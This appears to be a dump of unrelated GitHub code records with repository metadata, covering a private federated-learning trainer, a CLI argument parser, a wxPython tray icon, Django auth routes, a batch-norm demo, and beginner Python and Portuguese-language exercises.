Choose K clients prop to data size\n selected_clients, repeated_times = self.select_clients_with_prob(seed=round_i)\n\n # Solve minimization locally\n solns, stats = self.local_train(round_i, selected_clients)\n print(self.epsilon)\n\n # Track communication cost\n self.metrics.extend_commu_stats(round_i, stats)\n\n # Update latest model\n self.latest_model = self.aggregate(solns, repeated_times=repeated_times)\n self.optimizer.inverse_prop_decay_learning_rate(round_i)\n\n # Test final model on train data\n self.test_latest_model_on_traindata(self.num_round)\n self.test_latest_model_on_evaldata(self.num_round)\n\n # Save tracked information\n # 存到json文件中,以人类可读的方式\n self.metrics.write()\n\n def compute_prob(self):\n probs = []\n for 
c in self.clients:\n probs.append(len(c.train_data))\n return np.array(probs) / sum(probs)\n\n def select_clients_with_prob(self, seed=1):\n num_clients = min(self.clients_per_round, len(self.clients))\n np.random.seed(seed)\n index = np.random.choice(len(self.clients), num_clients, p=self.prob)\n index = sorted(index.tolist())\n\n select_clients = []\n select_index = []\n repeated_times = []\n for i in index:\n if i not in select_index:\n select_clients.append(self.clients[i])\n select_index.append(i)\n repeated_times.append(1)\n else:\n repeated_times[-1] += 1\n\n # to compute the accumulated PL\n for i in index:\n self.selected_times[i] += 1\n\n return select_clients, repeated_times\n\n def aggregate(self, solns, **kwargs):\n averaged_solution = torch.zeros_like(self.latest_model)\n # averaged_solution = np.zeros(self.latest_model.shape)\n if self.simple_average:\n repeated_times = kwargs['repeated_times']\n assert len(solns) == len(repeated_times)\n for i, (num_sample, local_solution) in enumerate(solns):\n # repeated_times[i] maybe means one client can be selected multiple times by uniform randomization\n # the noise addition position should be moved into client to be closer to the actual situation\n local_solution = local_solution / max(1, torch.norm(local_solution) / self.w_clip)\n sensitivity=torch.norm(local_solution)\n averaged_solution += (local_solution +\n (self.sigma ** 2) * (sensitivity ** 2) *\n torch.randn(local_solution.shape)) * repeated_times[i]\n averaged_solution /= self.clients_per_round\n else:\n for num_sample, local_solution in solns:\n averaged_solution += num_sample * local_solution\n averaged_solution /= self.all_train_data_num\n averaged_solution *= (100 / self.clients_per_round)\n # print(averaged_solution)\n print(torch.norm(averaged_solution))\n return averaged_solution.detach()\n\n def log_moment_generating_func(self, l, q):\n m = 0\n for k in range(0, l + 1):\n # calculate C(alpha, k)\n comb_num = math.factorial(l) / (math.factorial(k) * math.factorial(l - k))\n # notice: the exp() will easily cause overflow!! 
so sigma under 1 is dangerous\n m += comb_num * (1 - q) ** (l - k) * q ** k * math.exp((k ** 2 - k) / (2 * self.sigma ** 2))\n return math.log(m)\n\n def init_coefficient(self):\n for i in range(self.clients_num):\n q = self.batch_size / self.data_num[i]\n print(i, q)\n for j in range(1, self.l_max + 1):\n self.km[i][j] = self.log_moment_generating_func(j, q)\n\n def compute_privacy_loss_advanced(self, step, client):\n e = 1e9\n for l in range(1, self.l_max + 1):\n epsilon_with_l = (self.km[client][l] * step + math.log(1 / self.delta)) / l\n # print(l, epsilon_with_l)\n e = min(epsilon_with_l, e)\n return e\n","repo_name":"jasonchen505/AdaDPFedAvg","sub_path":"src/trainers/fedavg4.py","file_name":"fedavg4.py","file_ext":"py","file_size_in_byte":7537,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38979295684","text":"'''a = int(input(\"Enter First Number :\"))\nprint(type(a))\nb = int(input(\"enter second number :\"))\nc = a+b\nprint(c)\n\n'''\n\n#use # for single line comment\n#use ''' for multiline comment\n\na = float(input(\"Enter First Number :\"))\nb = float(input(\"enter second number :\"))\nc = a+b\n#print(\"sum of \",a,\"and\",b,\"is\",c)\n#print(\"sum of {} and {} is {}\".format(a,b,c))\n#print(f\"sum of {a} and {b} is {c}\")-\nprint(\"sum is %f\"%c)\nprint(\"sum of %f and %f = %f\"%(a,b,c))\n\n\n","repo_name":"Sahil4UI/Python_REG_Feb_Afternoon","sub_path":"code-1.py","file_name":"code-1.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20308196672","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCommand line argument parser and handler for the OpenTabulate console script.\n\nCreated and written by Maksym Neyra-Nesterenko, with support and funding from the\n*Center for Special Business Projects* (CSBP) at *Statistics Canada*.\n\"\"\"\nimport os\nimport sys\nimport argparse\nimport logging\nfrom opentabulate.main.config import ConfigError\nfrom opentabulate.main.config import DEFAULT_PATHS as def_paths\nfrom opentabulate.main.config import SUPPORTED_ENCODINGS as supp_enc\nfrom opentabulate.main.config import ENCODING_ERRORS as enc_errs\n\ndef parse_arguments():\n \"\"\"\n Define the command line argument structure and parse it.\n \"\"\"\n cmd_args = argparse.ArgumentParser(\n description='OpenTabulate: a command-line data tabulation tool.',\n usage='%(prog)s [options] [SOURCE [SOURCE ...]]',\n add_help=False\n )\n # positional arguments\n positional_args = cmd_args.add_argument_group('positional arguments')\n positional_args.add_argument('SOURCE', nargs='*', default=None, help='path to source file')\n\n # runtime options\n runtime_args = cmd_args.add_argument_group('runtime arguments')\n runtime_args.add_argument('-h', '--help', action='help',\n help='show this help message and exit')\n runtime_args.add_argument('--initialize', action='store_true', \n help='create processing directories')\n runtime_args.add_argument('-c', '--copy-config', action='store_true',\n help='copy example config file to ~/.config/opentabulate')\n runtime_args.add_argument('-s', '--verify-source', action='store_true', default=False,\n help='validate source files without processing data')\n runtime_args.add_argument('--clear-cache', action='store_true',\n help='clear processing redundancy cache')\n runtime_args.add_argument('--ignore-cache', action='store_true',\n help='ignore processing redundancy cache')\n runtime_args.add_argument('-t', 
'--threads', action='store', default=1, type=int, metavar='N',\n help='multithread data processing on N threads')\n \n # configuration options\n config_args = cmd_args.add_argument_group('configuration arguments',\n description='override configuration file options')\n config_args.add_argument('--add-index', action='store', default=None, type=str, metavar='BOOL',\n help='insert index column to output')\n config_args.add_argument('--target-enc', action='store', default=None, type=str, metavar='ENCODING',\n help='output character encoding')\n config_args.add_argument('--output-enc-errors', action='store', default=None, type=str, metavar='HANDLER',\n help='error handler for character re-encoding')\n config_args.add_argument('--clean-ws', action='store', default=None, type=str, metavar='BOOL',\n help='clean whitespace in output')\n config_args.add_argument('--lowercase', action='store', default=None, type=str, metavar='BOOL',\n help='convert output to lowercase')\n config_args.add_argument('-l', '--log-level', action='store', default=None, type=int, metavar='N',\n help='specify data processing log verbosity')\n \n return cmd_args.parse_args()\n\n\ndef validate_args_and_config(p_args, config, cache_mgrs):\n \"\"\"\n Validate the configuration file and command line arguments, then perform\n actions based on the read parameters.\n\n Note:\n p_args is modified in this method.\n\n Args:\n p_args (argparse.Namespace): Parsed arguments.\n config (Configuration): OpenTabulate configuration.\n cache_mgrs (list): List of CacheManager objects.\n \"\"\"\n data_folders = ('./data', './data/input', './data/output', './sources')\n \n if p_args.copy_config == True:\n if os.path.exists(def_paths['conf_file']):\n print(\"Configuration file already exists, not doing anything.\", file=sys.stderr)\n sys.exit(1)\n \n conf_example = os.path.join(\n os.path.dirname(__file__),\n '../share/opentabulate.conf.example'\n )\n try:\n assert os.path.exists(conf_example)\n except AssertionError:\n print(\"Cannot find or read example OpenTabulate configuration.\", file=sys.stderr)\n sys.exit(1)\n\n print(\"Copying configuration to %s.\" % def_paths['conf_file'])\n\n # create configuration directory if it doesn't already exist\n os.makedirs(def_paths['conf_dir'], exist_ok=True)\n\n # write example configuration file\n with open(def_paths['conf_file'], 'wb') as outfile, open(conf_example, 'rb') as infile:\n outfile.write(infile.read())\n\n print(\"Done.\")\n sys.exit(0)\n\n # load and validate configuration\n try:\n config.load()\n config.validate()\n except ConfigError as conf_err:\n print(\"Configuration error: %s\" % conf_err, file=sys.stderr)\n sys.exit(1)\n except Exception as err: # other errors (such as loading file)\n print(\"Error: %s\" % err, file=sys.stderr)\n sys.exit(1)\n \n root_dir = config.get('general', 'root_directory')\n\n # check that root directory is an absolute path\n try:\n assert os.path.isabs(os.path.expanduser(root_dir))\n except AssertionError:\n print(\"Configuration error: root directory must be an absolute path\",\n file=sys.stderr)\n sys.exit(1)\n \n if p_args.initialize == True:\n # try to populate root directory with folders (also validate\n # its creation and contents)\n try:\n os.makedirs(root_dir, exist_ok=True)\n except FileExistsError:\n print(root_dir, \"is a file.\", file=sys.stderr)\n sys.exit(1)\n \n os.chdir(root_dir)\n\n if len(os.listdir()) != 0:\n print(\"OpenTabulate data directory is non-empty, cannot initialize.\",\n file=sys.stderr)\n sys.exit(1)\n else:\n print(\"Populating 
OpenTabulate data directory...\")\n for directory in data_folders:\n os.makedirs(directory)\n print(\"Finished creating directories at: %s\" % os.getcwd())\n sys.exit(0)\n\n # clear cache and exit if --clear-cache flag is set\n if p_args.clear_cache == True:\n print(\"Clearing cache.\")\n for manager in cache_mgrs:\n manager.write_cache() # this writes an empty cache\n sys.exit(0)\n\n # update SOURCE paths to absolute paths *BEFORE* changing current working directory\n for i in range(len(p_args.SOURCE)):\n p_args.SOURCE[i] = os.path.realpath(p_args.SOURCE[i])\n \n # check that OpenTabulate's root directory exists\n try:\n os.chdir(root_dir)\n except (FileNotFoundError, NotADirectoryError):\n print(\"Error: configured OpenTabulate directory does not exist or\"\n \" not a directory.\", file=sys.stderr)\n sys.exit(1)\n\n # verify that the data directories are intact\n for directory in data_folders:\n if not os.path.isdir(directory):\n print(\"Error: data directories are misconfigured.\", file=sys.stderr)\n sys.exit(1)\n\n # now we validate other command-line arguments here\n if p_args.SOURCE == []:\n print(\"Error: no SOURCE argument specified.\", file=sys.stderr)\n sys.exit(1)\n\n if int(p_args.threads) <= 0:\n print(\"Error: number of threads must be > 0.\", file=sys.stderr)\n sys.exit(1)\n \n log_level_map = {0 : logging.DEBUG,\n 1 : logging.INFO,\n 2 : logging.WARNING,\n 3 : logging.ERROR}\n\n # override configuration options if command line flags are used \n if p_args.add_index is not None:\n config['general']['add_index'] = p_args.add_index\n try:\n config.getboolean('general', 'add_index')\n except ValueError:\n print(\"Error: add index flag must be a boolean value.\", file=sys.stderr)\n sys.exit(1)\n \n if p_args.target_enc is not None:\n if p_args.target_enc not in supp_enc:\n print(\"Error: '%s' is not a supported output encoding.\" \n % p_args.target_enc, file=sys.stderr)\n sys.exit(1)\n else:\n config['general']['target_encoding'] = p_args.target_enc\n\n if p_args.output_enc_errors is not None:\n if p_args.output_enc_errors not in enc_errs:\n print(\"Error: '%s' is not an output encoding error handler.\"\n % p_args.output_enc_errors)\n sys.exit(1)\n else:\n config['general']['output_encoding_errors'] = p_args.output_enc_errors\n\n if p_args.clean_ws is not None:\n config['general']['clean_whitespace'] = p_args.clean_ws\n try:\n config.getboolean('general', 'clean_whitespace')\n except ValueError:\n print(\"Error: clean whitespace flag must be a boolean value.\", file=sys.stderr)\n sys.exit(1)\n\n if p_args.lowercase is not None:\n config['general']['lowercase_output'] = p_args.lowercase\n try:\n config.getboolean('general', 'lowercase_output')\n except ValueError:\n print(\"Error: lowercase flag must be a boolean value.\", file=sys.stderr)\n sys.exit(1)\n \n if p_args.log_level is not None:\n if p_args.log_level in log_level_map:\n logging.basicConfig(format='[%(levelname)s] <%(name)s>: %(message)s',\n level=log_level_map[p_args.log_level])\n else:\n print(\"Error: log level must be 0, 1, 2 or 3 (the lower, the more verbose).\", \n file=sys.stderr)\n sys.exit(1)\n else:\n logging.basicConfig(format='[%(levelname)s] <%(name)s>: %(message)s',\n level=log_level_map[config.getint('general', 'log_level')])\n","repo_name":"CSBP-CPSE/OpenTabulate","sub_path":"opentabulate/main/args.py","file_name":"args.py","file_ext":"py","file_size_in_byte":10144,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"26256507658","text":"# 
tray.py: system tray support\n# arch-tag: system tray support\n# author: Alberto Griggio \n# license: GPL\n\nimport wx\nimport common\n\n__all__ = ['show_tray_icon']\n\n_supported = getattr(wx, 'TaskBarIcon', None) is not None\n\nif _supported:\n def show_tray_icon(app):\n tbicon = wx.TaskBarIcon()\n tbicon.SetIcon(common.get_theme_icon())\n\n ID_MINIMIZE = wx.NewId()\n ID_HIDE = wx.NewId()\n ID_QUIT = wx.NewId()\n \n def on_right_down(event):\n menu = wx.Menu('Cornice')\n menu.Append(ID_HIDE, _('Show/Hide'))\n menu.Append(ID_MINIMIZE, _('Minimize/Restore'))\n menu.AppendSeparator()\n menu.Append(ID_QUIT, _('Quit'))\n tbicon.PopupMenu(menu)\n menu.Destroy()\n\n def on_minimize(event):\n if app.main_frame is None:\n app.create_frames()\n \n if app.main_frame.IsShown():\n app.main_frame.Iconize(not app.main_frame.IsIconized())\n if app.viewer_frame.IsShown():\n app.viewer_frame.Iconize(not app.viewer_frame.IsIconized())\n\n def on_hide(event):\n if app.main_frame is None:\n app.create_frames()\n\n if app.main_frame.IsShown():\n app.main_frame.Hide()\n app.viewer_frame.Hide()\n elif app.viewer_frame.IsShown():\n app.viewer_frame.Hide()\n else:\n app.main_frame.Show()\n\n def on_quit(event):\n common.really_exit_app()\n \n wx.EVT_TASKBAR_LEFT_DOWN(tbicon, on_hide)\n wx.EVT_TASKBAR_RIGHT_DOWN(tbicon, on_right_down)\n wx.EVT_MENU(tbicon, ID_MINIMIZE, on_minimize)\n wx.EVT_MENU(tbicon, ID_HIDE, on_hide)\n wx.EVT_MENU(tbicon, ID_QUIT, on_quit)\n\n return tbicon\n \nelse:\n def show_tray_icon(app):\n class TbIcon:\n def Destroy(self):\n pass\n return TbIcon()\n\n","repo_name":"dvrhax/cornice3","sub_path":"tray.py","file_name":"tray.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"71876949928","text":"from typing import List\n\nclass Solution:\n def search(self, nums: List[int], target: int) -> int:\n left = 0\n right = len(nums) - 1\n\n while left < right and nums[left] > nums[right]:\n i = (right - left) // 2\n if nums[left + i] > nums[left] and i > 0:\n left = i + left\n elif i > 0:\n right = i + left\n else:\n left = right\n\n if left > 0 and nums[0] <= target <= nums[left - 1]:\n return Solution.binary(nums[:left], target)\n\n if nums[left] <= target <= nums[-1]:\n solution = Solution.binary(nums[left:], target)\n return left + solution if solution != -1 else -1\n\n return -1\n\n @staticmethod\n def binary(nums: List[int], target: int) -> int:\n left, right = 0, len(nums) - 1\n\n while left < right:\n middle = (right - left) // 2\n if nums[middle + left] == target:\n return middle + left\n elif target > nums[middle + left]:\n left = left + middle + 1\n else:\n right = left + middle - 1\n\n return left if target == nums[left] else -1\n\n\n\nsolution = Solution()\nprint(solution.search(nums = [4,5,6,7,0,1,2], target = 2))","repo_name":"nikpopesku/leetcode","sub_path":"python/0-99/33_search_in_rotated_array.py","file_name":"33_search_in_rotated_array.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17935310075","text":"import math\n\ndef champernowne(n) :\n \n champ = \"\"\n i = 0\n j = 0\n digits = []\n \n while len(champ)\")\n # Calc w\n w0 = 2*pi / sympy.simplify(periodo_T)\n # Getting the functions from keyboard \n input_user = input(\"Ingresa la lista de las funciones, separadas por ,\\n->\")\n expressions = input_user.split(\",\")\n # expressions_sympy\n expressions_sympy = 
[sympy.simplify(expression) for expression in expressions]\n\n # obtaining limits \n limits = []\n for expression in expressions:\n print(expression)\n limits.append(\n [sympy.simplify(input(\"limiteSuperior->\")),sympy.simplify(input(\"limiteInferior->\"))]\n )\n # calculating a0\n total_a0 = obtaining_a0(expressions_sympy,limits,periodo_T)\n expression_aN = obtaining_aN(expressions_sympy, limits, periodo_T, w0)\n expression_bN = obtaining_bN(expressions_sympy, limits, periodo_T, w0)\n\n print(f\"\\nEl resultado de a0 es: {total_a0} <--\\n\\n\")\n sympy.pretty_print(expression_aN, use_unicode=True)\n print(\"\\n\\n\")\n sympy.pretty_print(expression_bN, use_unicode=True)\n calculating_f_x(expression_aN,expression_bN, total_a0, w0)\n","repo_name":"RaigoXD/Fourier_Dummies","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"601431521","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth.views import LoginView,LogoutView\n\nurlpatterns = [\n path('signup/', views.SignUp, name='signup'),\n path('login/', LoginView.as_view(template_name='auth/login.html'),name=\"login_url\"),\n path('logout/', LogoutView.as_view(next_page='login'),name=\"logout\"),\n path('users/list', views.index, name=\"users_list\"),\n path('users/add', views.AddUser, name=\"add_user\"),\n path('users/update/', views.UpdateUser, name=\"update_user\"),\n path('users/delete/', views.DeleteUser, name=\"delete_user\"), \n]\n","repo_name":"fa0xh1/Django_Base_Startup","sub_path":"myproject/accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"281364559","text":"import torch\r\nfrom torch import nn\r\nimport torch.utils.data as Data\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n#train data\r\nx = np.linspace(-5, 5, 1000)[:, np.newaxis]\r\ny = np.square(x) + np.random.normal(0, 1, x.shape)\r\ntrain_x = torch.from_numpy(x).float()\r\ntrain_y = torch.from_numpy(y).float()\r\n\r\n# test data\r\ntest_x = np.linspace(-5, 5, 100)[:, np.newaxis]\r\ntest_y = np.square(test_x) + np.random.normal(0, 1, test_x.shape)\r\ntest_x = torch.from_numpy(test_x).float()\r\ntest_y = torch.from_numpy(test_y).float()\r\n\r\ntrain_dataset = Data.TensorDataset(train_x, train_y)\r\ntrain_loader = Data.DataLoader(dataset=train_dataset, batch_size=64, shuffle=True, num_workers=2,)\r\n\r\nclass Net(torch.nn.Module):\r\n def __init__(self):\r\n super(Net,self).__init__()\r\n #self.bn_input=nn.BatchNorm1d(1,momentum=0.5)\r\n self.fc0=nn.Linear(1,10)\r\n self.bn0=nn.BatchNorm1d(10,momentum=0.5)\r\n self.fc1=nn.Linear(10,10)\r\n self.bn1=nn.BatchNorm1d(10,momentum=0.5)\r\n self.fc2=nn.Linear(10,10)\r\n self.bn2=nn.BatchNorm1d(10,momentum=0.5)\r\n self.fc3=nn.Linear(10,10)\r\n self.bn3=nn.BatchNorm1d(10,momentum=0.5)\r\n self.predict=nn.Linear(10,1)\r\n \r\n def forward(self,x):\r\n x = self.fc0(x)\r\n x = self.bn0(x) # batch normalization\r\n x = torch.tanh(x)\r\n\r\n x = self.fc1(x)\r\n x = self.bn1(x) # batch normalization\r\n x = torch.tanh(x)\r\n\r\n x = self.fc2(x)\r\n x = self.bn2(x) # batch normalization\r\n x = torch.tanh(x)\r\n\r\n x = self.fc3(x)\r\n x = self.bn3(x) # batch normalization\r\n x = torch.tanh(x)\r\n\r\n out=self.predict(x)\r\n return out\r\n\r\nnet=Net() 
\r\nopt=torch.optim.Adam(net.parameters(),lr=0.02)\r\n#print(opt.param_groups) \r\n\r\nloss_func=nn.MSELoss()\r\nif __name__ == \"__main__\":\r\n l=[] \r\n for epoch in range(10):\r\n print('Epoch: ', epoch)\r\n net.eval() # set eval mode to fix moving_mean and moving_var\r\n pred = net(test_x)\r\n l.append(loss_func(pred, test_y).data.item())\r\n net.train() # free moving_mean and moving_var\r\n for step, (b_x, b_y) in enumerate(train_loader):\r\n pred = net(b_x)\r\n loss = loss_func(pred, b_y)\r\n opt.zero_grad()\r\n loss.backward()\r\n opt.step() # it will also learns the parameters in Batch Normalization\r\n print(l)\r\n plt.figure(1)\r\n \r\n plt.plot(l, c='#74BCFF', lw=2, label='Batch Normalization')\r\n plt.xlabel('step');plt.ylabel('test loss');plt.ylim((0, 200));plt.legend(loc='best')\r\n\r\n # evaluation\r\n # set net to eval mode to freeze the parameters in batch normalization layers\r\n net.eval() \r\n preds = net(test_x)\r\n plt.figure(2)\r\n\r\n plt.plot(test_x.data.numpy(), preds.data.numpy(), c='#74BCFF', lw=3, label='Batch Normalization')\r\n plt.scatter(test_x.data.numpy(), test_y.data.numpy(), c='r', s=50, alpha=0.2, label='train')\r\n plt.legend(loc='best')\r\n plt.show()\r\n","repo_name":"xc-G/batchnormalization","sub_path":"BN_pytorch.py","file_name":"BN_pytorch.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15121769072","text":"#Exércício 1#\n\n\"\"\"\n Peça ao usuário para digitar o nome e a idade.\n Se forem digitados, exiba:\n 'Seu nome é {nome}'\n 'Seu nome invertido é {nomeinvertido}'\n Se nome contêm ou não espaços\n 'Seu nome tem {n} letras'\n 'A primeira letra do seu nome é {primeira_letra}'\n 'A última letra do seu nome é {ultima_letra}'\n Se nada for digitado:\n 'Desculpe, você deixou campos vazios'\n \n\"\"\"\n\nnome = input('Digite seu nome: ')\nidade = input('Digite sua idade: ')\n\nif nome != \"\" and idade != \"\":\n print(f'Seu nome é {nome}')\n print(f'Seu nome invertido é {nome[::-1]}')\n print(\" \" in nome)\n print(f'Seu nome tem {len(nome)} letras')\n print(f'A primeira letra do seu nome é {nome[0]}')\n print(f'A ultima letra do seu nome é {nome[len(nome) - 1 ]}')\nelse:\n print('Desculpe, você deixou campos vazios')\n\n#EXERCÍCIO 2#\n\n\"\"\"\nFaça um programa que peça ao usuário para digitar um número inteiro,\ninforme se este número é par ou ímpar. Caso o usuário não digite um número\ninteiro, informe que não é um número inteiro.\n\"\"\"\n\nnumero = int(input(\"Digite um número inteiro: \"))\n\nif (numero % 2) == 0:\n print('Numero {} é par'.format(numero))\nelif (numero % 3) == 0:\n print(f'Número {numero:,.2f} é impar')\n\n\"\"\"\nFaça um programa que pergunte a hora ao usuário e, baseando-se no horário \ndescrito, exiba a saudação apropriada. Ex. \nBom dia 0-11, Boa tarde 12-17 e Boa noite 18-23.\n\"\"\"\n\nhora = int(input(\"Informe a hora: \"))\n\nif hora >= 0 and hora <= 11:\n print('Bom dia!!!!')\nelif hora >= 12 and hora <= 17:\n print('Boa tarde!!!!')\nelse:\n print('Boa noite!!!!')\n\n\"\"\"\nFaça um programa que peça o primeiro nome do usuário. Se o nome tiver 4 letras ou \nmenos escreva \"Seu nome é curto\"; se tiver entre 5 e 6 letras, escreva \n\"Seu nome é normal\"; maior que 6 escreva \"Seu nome é muito grande\". 
\n\"\"\"\n\nprimeiro_numero = input('Informe seu primeiro nome: ')\ntamanho_nome = len(primeiro_numero)\n\nif tamanho_nome <= 4:\n print('Seu nome é curto')\nelif tamanho_nome in (5,6):\n print('Seu nome é normal')\nelse:\n print('Seu nome é muito grande')\n\n#EXERCÍCIO 3#\n\nnome = 'Victor Hugo'\nqtd_caracteres = len(nome)\nx = 0\ntexto = ''\n\nwhile x <= qtd_caracteres:\n\n try:\n texto_inicio = '*' + nome[x]\n texto = texto + texto_inicio\n except:\n print(texto)\n break\n \n x += 1 \n\n#EXERCÍCIO 4 - CALCULADORA#\n\nwhile True:\n print('Informe a operação desejada!')\n operacao = int(input('1 - SOMA 2 - SUBTRAÇÃO 3 - MULTIPLICAÇÃO 4 - POTENCIAÇÃO 5 - DIVISÃO 6 - SAIR: '))\n\n if operacao == 1:\n\n while True:\n\n try:\n primeiro_numero = int(input('Informe o 1º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n \n while True:\n\n try:\n segundo_numero = int(input('Informe o 2º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n\n resultado = primeiro_numero + segundo_numero\n \n print(f'O resultado é {resultado}')\n\n elif operacao == 2:\n\n while True:\n\n try:\n primeiro_numero = int(input('Informe o 1º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n \n while True:\n\n try:\n segundo_numero = int(input('Informe o 2º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n\n resultado = primeiro_numero - segundo_numero\n\n print(f'O resultado é {resultado}')\n\n elif operacao == 3:\n\n while True:\n\n try:\n primeiro_numero = int(input('Informe o 1º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n \n while True:\n\n try:\n segundo_numero = int(input('Informe o 2º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n\n resultado = primeiro_numero * segundo_numero\n\n print(f'O resultado é {resultado}')\n\n elif operacao == 4:\n\n while True:\n\n try:\n primeiro_numero = int(input('Informe o 1º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n \n while True:\n\n try:\n segundo_numero = int(input('Informe o 2º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n\n resultado = primeiro_numero ** segundo_numero\n\n print(f'O resultado é {resultado}')\n\n elif operacao == 5:\n\n while True:\n\n try:\n primeiro_numero = int(input('Informe o 1º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n \n while True:\n\n try:\n segundo_numero = int(input('Informe o 2º número: '))\n break\n except:\n print('Informe um número válido!')\n continue\n\n resultado = primeiro_numero / segundo_numero\n\n print(f'O resultado é {resultado}')\n else:\n\n break\n\n#EXERCÍCIO 5#\n\nfrase = 'Sou o melhor, posso não ser' \\\n 'mas na minha cabeça, sou o melhor'.lower()\n\nx = 0\n\nletra_que_mais_apareceu = \" \"\nqtd_de_vezes = 0\n\nwhile x < len(frase):\n letra_atual = frase[x]\n\n if letra_atual == \" \":\n x +=1\n continue\n else:\n qtd = frase.count(letra_atual)\n\n if qtd_de_vezes < qtd:\n qtd_de_vezes = qtd\n letra_que_mais_apareceu = letra_atual\n\n x +=1\n\nprint(f'A letra que apareceu mais vezes é \"{letra_que_mais_apareceu}\" totalizando {qtd_de_vezes} aparições')\nprint(x)\n\n#EXERCÍCIO 6#\n\nimport os\n\nfrase_secreta = 'RIBEIRAO'\n\nfor frase_oculta in frase_secreta:\n frase_oculta = '*' * len(frase_secreta)\n\nprint(frase_oculta)\n\nqtd_tentativas = 0\n\nwhile frase_oculta != frase_secreta:\n\n while True:\n\n letra = str(input('Informe uma letra: 
')).upper()\n\n qtd_tentativas += 1\n\n if letra in ('0','1','2','3','4','5','6','7','8','9'):\n print('Informe apenas letras.')\n continue\n elif len(letra) > 1:\n print('Apenas UMA letra')\n continue\n elif letra == \"\":\n print(\"Digite algo!\")\n continue\n else:\n break\n \n x = 0\n\n while True:\n\n if letra in frase_secreta:\n\n while x < len(frase_secreta):\n \n indice = frase_secreta.find(letra, x)\n\n if indice == -1:\n break\n else:\n frase_oculta = frase_oculta[0:(indice)] + letra + frase_oculta[indice+1:]\n \n x += 1\n else:\n print('Tente novamente')\n\n print(frase_oculta)\n\n break\n\nos.system('cls') #LIMPA O TERMINAL\nprint('VOCÊ GANHOU')\nprint(f'A frase oculta é \"{frase_oculta}\"')\nprint(f'A quantidade de tentativas foi de {qtd_tentativas}')\n\n#EXERCÍCIO 7#\n\nlista = [\"Victor\",\"Maria\",\"Birigo\"]\n\nfor indice, produto in lista:\n print(indice, produto)\nfor indice in [0, 1, 2]:\n print(indice)\n\n#EXERCÍCIO 8#\n\nimport os\nlista = []\n\nwhile True:\n \n opcao = input('Selecione uma das opções\\n[i]nserir, [a]pagar, [l]istar: ')\n\n if opcao == 'i':\n os.system('cls')\n valor = input('Informe o valor: ')\n \n if valor == \"\":\n print('Informe um valor')\n continue\n else:\n lista.append(valor)\n\n elif opcao == 'a':\n\n os.system('cls')\n\n indice = int(input('Informe o indice à ser retirado: '))\n\n if len(lista) < indice:\n print('Indice Inválido')\n else:\n try:\n lista.pop(indice)\n except:\n print('Lista Vazia')\n\n elif opcao == 'l':\n os.system('cls')\n lista_numerada = list(enumerate(lista))\n\n for indice, produto in enumerate(lista):\n print(indice, produto)\n \n break\n\n#EXERCÍCIO 9#\n\ndigitos = input('Informe os 9 primeiros dígitos do seu CPF: ')\n\nif len(digitos) > 9:\n print(f'Informe apenas 9 digitos você digitou {len(digitos)} digitos.')\nelse:\n num1, num2, num3, num4, num5, num6, num7, num8, num9 = digitos\n total = (int(num1) * 10) +( int(num2) * 9) + (int(num3) * 8) + (int(num4) * 7) +( int(num5) * 6) +( int(num6) * 5 )+ (int(num7) * 4 )+ (int(num8) * 3) +( int(num9) * 2)\n \n primeiro_digito = (total * 10) % 11\n\n if primeiro_digito > 9:\n primeiro_digito = 0\n\n print(primeiro_digito)\n\n total2 = (int(num1) * 11) +( int(num2) * 10) + (int(num3) * 9) + (int(num4) * 8) +( int(num5) * 7) +( int(num6) * 6 )+ (int(num7) * 5 )+ (int(num8) * 4) +( int(num9) * 3) + (int(primeiro_digito) * 2)\n\n segundo_digito = (total2 * 10) % 11\n\n print(segundo_digito)\n\n#EXERCÍCIO 10#\n\ndef mult(*num):\n total = 1\n\n for numero in num:\n total *= numero\n\n return total\n\nmultiplica = mult(1,3,5)\nprint(multiplica)\n\ndef tipo(multiplica):\n\n if multiplica % 2 == 0:\n print(f'Número {multiplica} é par!')\n else:\n print(f'Número {multiplica} é ímpar!')\n\ntipo(multiplica)\n \n#EXERCÍCIO 11#\n\ndef duplicar(numero):\n return numero * 2\n\nn2 = duplicar(3)\nprint(n2)\n\ndef multiplicador(multp):\n def multiplicar(numero):\n return numero * multp\n return multiplicar\n\nn2 = multiplicador(3)\nprint(n2(3))","repo_name":"vitihnho/Python","sub_path":"EXERCÍCIOS.py","file_name":"EXERCÍCIOS.py","file_ext":"py","file_size_in_byte":9936,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39409553176","text":"try:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\nconfig = {\n 'description': 'A toy interactive C++ interpreter',\n 'author': 'Tiensbakung',\n 'url': '#URL to get it.#',\n 'download_url': '#Where to download it#',\n 'author_email': 
